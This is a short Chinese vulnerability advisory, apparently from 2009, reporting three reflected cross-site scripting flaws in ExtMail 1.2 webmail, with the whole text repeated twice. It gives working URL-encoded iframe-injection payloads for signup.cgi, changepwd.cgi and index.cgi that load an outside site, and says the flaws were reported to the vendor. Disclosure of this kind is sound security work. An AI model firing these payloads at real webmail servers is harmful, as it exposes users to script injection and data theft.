VULHUB ™

北洋贱队2009.12.31首发 Extmail 是一个以perl语言编写，面向大容量/ISP级应用，免费的高性能Webmail软件。 最新版本为1.2，检测出三出处跨站漏洞。 1.免费新用户注册的"signup.cgi"对‘domain’参数未进行参数过滤，构建恶意脚本代码作为参数数据，并诱使用户访问恶意链接，可触发恶意脚本代码在目标用户浏览器上执行，导致敏感信息泄漏。 demo:http://demo.extmail.org/extman/cgi/signup.cgi?domain=%22%3E%3Ciframe%20src=http://www.gohack.org%3E 2.重置密码"forgetpwd.cgi"为对提交的用户名进行检测过滤，导致产生跨站漏洞 demo:http://demo.extmail.org/extman/cgi/changepwd.cgi post: %22%3E%3Ciframe%20src=http://www.gohack.org%3E 3.webmail登录状态验证为进行参数过滤，导致跨站漏洞，可可触发恶意脚本代码在目标用户浏览器上执行。 demo:http://demo.extmail.org/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=http://www.gohack.org%3E ExtMail 1.2 以上漏洞均以提交给ExtMail官方，静待补丁发放

北洋贱队2009.12.31首发 Extmail 是一个以perl语言编写，面向大容量/ISP级应用，免费的高性能Webmail软件。 最新版本为1.2，检测出三出处跨站漏洞。 1.免费新用户注册的"signup.cgi"对‘domain’参数未进行参数过滤，构建恶意脚本代码作为参数数据，并诱使用户访问恶意链接，可触发恶意脚本代码在目标用户浏览器上执行，导致敏感信息泄漏。 demo:http://demo.extmail.org/extman/cgi/signup.cgi?domain=%22%3E%3Ciframe%20src=http://www.gohack.org%3E 2.重置密码"forgetpwd.cgi"为对提交的用户名进行检测过滤，导致产生跨站漏洞 demo:http://demo.extmail.org/extman/cgi/changepwd.cgi post: %22%3E%3Ciframe%20src=http://www.gohack.org%3E 3.webmail登录状态验证为进行参数过滤，导致跨站漏洞，可可触发恶意脚本代码在目标用户浏览器上执行。 demo:http://demo.extmail.org/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=http://www.gohack.org%3E ExtMail 1.2 以上漏洞均以提交给ExtMail官方，静待补丁发放